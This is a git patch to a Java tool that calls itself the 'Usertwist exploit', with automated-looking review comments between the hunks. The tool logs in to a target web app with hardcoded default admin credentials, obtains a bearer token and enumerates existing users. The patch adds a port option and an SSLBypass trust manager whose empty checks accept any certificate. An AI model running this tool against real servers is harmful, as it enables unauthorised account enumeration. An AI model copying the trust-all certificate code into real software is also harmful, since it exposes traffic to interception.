From fb4c53fe362fa2ce663552650777c319f925f8f0 Mon Sep 17 00:00:00 2001
From: Mateo
Date: Thu, 1 Aug 2024 15:51:18 +0200
Subject: [PATCH] Added SSL verification bypass & port choice

---
 .idea/inspectionProfiles/Project_Default.xml | 2 +-
 src/fr/motysten/usertwist/exploit/Main.java | 58 ++++++++++++++++---
 .../usertwist/exploit/tools/SSLBypass.java | 43 ++++++++++++++
 3 files changed, 95 insertions(+), 8 deletions(-)
 create mode 100644 src/fr/motysten/usertwist/exploit/tools/SSLBypass.java

diff --git a/.idea/inspectionProfiles/Project_Default.xml b/.idea/inspectionProfiles/Project_Default.xml
index 869c305..ec2d9bf 100644
--- a/.idea/inspectionProfiles/Project_Default.xml
+++ b/.idea/inspectionProfiles/Project_Default.xml
@@ -2,7 +2,7 @@
\ No newline at end of file
diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java
index fa5c910..7efd3b3 100644
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -1,9 +1,14 @@
 package fr.motysten.usertwist.exploit;
 import fr.motysten.usertwist.exploit.tools.Cesar;
+import fr.motysten.usertwist.exploit.tools.SSLBypass;
 import org.json.JSONArray;
 import org.json.JSONObject;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLException;
+import javax.net.ssl.SSLHandshakeException;
+import javax.net.ssl.TrustManager;
 import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStreamReader;
@@ -11,16 +16,23 @@ import java.net.URI;
 import java.net.http.HttpClient;
 import java.net.http.HttpRequest;
 import java.net.http.HttpResponse;
+import java.security.KeyManagementException;
+import java.security.NoSuchAlgorithmException;
+import java.security.SecureRandom;
 public class Main {
 public static String link = "https://poc.athelas.fr";
 public static String username = "admin";
 public static String password = "AdminSecret1C";
+ public static String port = "443";
- public static void main(String[] args) throws IOException, InterruptedException {
+ public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
 BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
+ SSLContext customContext = SSLContext.getInstance("TLS");
+ customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
+
 System.out.println("Usertwist exploit by Motysten");
 System.out.println("Please don't use for unethical purpose !\n");
 String readLine;
@@ -29,6 +41,10 @@ public class Main {
 readLine = reader.readLine();
 if (!readLine.isEmpty()) {link = readLine;}
+ System.out.println("Please enter the port of the remote web server (leave empty to use default) :");
+ readLine = reader.readLine();
+ if (!readLine.isEmpty()) {port = readLine;}
+
 System.out.println("Please enter the used username (leave empty to use default) :");
 readLine = reader.readLine();
 if (!readLine.isEmpty()) {username = readLine;}
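Review bot: The value read at the new `Please enter the port` prompt is copied verbatim into the `port` field with no validation, so a non-numeric or out-of-range entry only surfaces later as an `IllegalArgumentException` from `URI.create` when the login request is built. Parse it before accepting it: `int p = Integer.parseInt(readLine);` inside a `try`, reject `p < 1 || p > 65535`, and on `NumberFormatException` print `Invalid port, keeping ` + port and leave the field unchanged. Since the field is only ever concatenated into a URI, declaring it as `int` with the default `443` would make that check the natural type boundary; the String form is kept here only to stay close to the existing `link`/`username` fields. The enclosing `main` continues past the end of this hunk.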
@@ -45,14 +61,42 @@ public class Main {
 System.out.println("Gathering Bearer token...");
- HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
- .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
- .build();
+ HttpResponse response = null;
+ HttpRequest request;
- HttpResponse response = client.send(request, HttpResponse.BodyHandlers.ofString());
+ boolean tokenFound = false;
+ while (!tokenFound) {
+ try {
+ request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/login"))
+ .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
+ .build();
+
+ response = client.send(request, HttpResponse.BodyHandlers.ofString());
+ tokenFound = true;
+ } catch (SSLHandshakeException e) {
+ System.err.println("Remote server certificate issuer couldn't be verified. Someone could be spying on your network.");
+ System.err.println("Would you like to continue anyway ? [y/N]");
+ if (!reader.readLine().equalsIgnoreCase("y")) {
+ System.err.println("Operation aborted ! Security failure.");
+ System.exit(1);
+ } else {
+ client = HttpClient.newBuilder().sslContext(customContext).build();
+ }
+ } catch (SSLException e) {
+ if (e.getMessage().contains("plaintext connection?")) {
+ System.err.println("Looks like you're trying to send an HTTPS request on HTTP port. Would you like to switch on port 443 ? [Y/n]");
+ if (reader.readLine().equalsIgnoreCase("n")) {
+ System.err.println("Operation aborted !");
+ System.exit(1);
+ } else {
+ port = "443";
+ }
+ }
+ }
+ }
 if (response.statusCode() == 401) {
- System.err.println("Invalid credentials ! Pleas try again (defaults credentials could help)");
+ System.err.println("Invalid credentials ! Please try again (defaults credentials could help)");
 System.exit(1);
 }
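Review bot: In the new `catch (SSLException e)` branch of the login loop, any `SSLException` whose message does not contain `plaintext connection?` is swallowed and the `while (!tokenFound)` loop resends the identical request forever, and `e.getMessage()` can be null, which turns the check itself into a NullPointerException. Rethrow what the branch does not handle and make the match null-safe: `String msg = e.getMessage();`, `if (msg != null && msg.contains("plaintext connection?")) {`, `} else { throw e; }`. The `reader.readLine()` result in both catch branches is dereferenced without a null check, so EOF on stdin becomes a NullPointerException rather than the intended abort. `HttpResponse response = null;` is now a raw type; `HttpResponse<String> response = null;` keeps `response.body()` typed for the token parsing that follows. The enclosing `main` starts and ends outside this hunk, and the `link + ":" + port` concatenation introduced here and in the `/references` hunk below yields an invalid URI whenever the entered `link` already carries a port or a trailing slash.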
@@ -67,7 +111,7 @@ public class Main {
 System.out.println("\nScanning for existing users...");
- request = HttpRequest.newBuilder(URI.create(link + "/references"))
+ request = HttpRequest.newBuilder(URI.create(link + ":" + port + "/references"))
 .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
 .setHeader("Authorization", "Bearer " + token)
 .build();
diff --git a/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java b/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
new file mode 100644
index 0000000..94fb2c9
--- /dev/null
+++ b/src/fr/motysten/usertwist/exploit/tools/SSLBypass.java
@@ -0,0 +1,43 @@
+package fr.motysten.usertwist.exploit.tools;
+
+import javax.net.ssl.SSLEngine;
+import javax.net.ssl.X509ExtendedTrustManager;
+import java.net.Socket;
+import java.security.cert.X509Certificate;
+
+public class SSLBypass extends X509ExtendedTrustManager {
+ @Override
+ public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+ }
+
+ @Override
+ public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+ }
+
+ @Override
+ public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+ }
+
+ @Override
+ public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+ }
+
+ @Override
+ public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
+
+ }
+
+ @Override
+ public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
+
+ }
+
+ @Override
+ public X509Certificate[] getAcceptedIssuers() {
+ return new X509Certificate[0];
+ }
+}
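Review bot: `SSLBypass` carries no Javadoc, and its empty `checkServerTrusted` overrides accept every chain unconditionally, so after the user answers "y" once in `Main` the tool can no longer distinguish a self-signed lab certificate from a different chain presented later in the same session. A class comment should say so plainly, e.g. `/** Trust manager that accepts any certificate chain without validation; Main installs it only after the user has explicitly accepted an unverifiable server certificate. */`. A safer shape that keeps the same user flow is to capture the presented leaf certificate in `checkServerTrusted`, show its subject and SHA-256 fingerprint in the prompt, and pin that one certificate for the rest of the session rather than trusting everything; that is a larger change than fits in this note. The three `checkClientTrusted` overrides should not be reached from an `HttpClient` caller, and a one-line comment marking them as client-side-only stubs would save the next reader from looking for a server use.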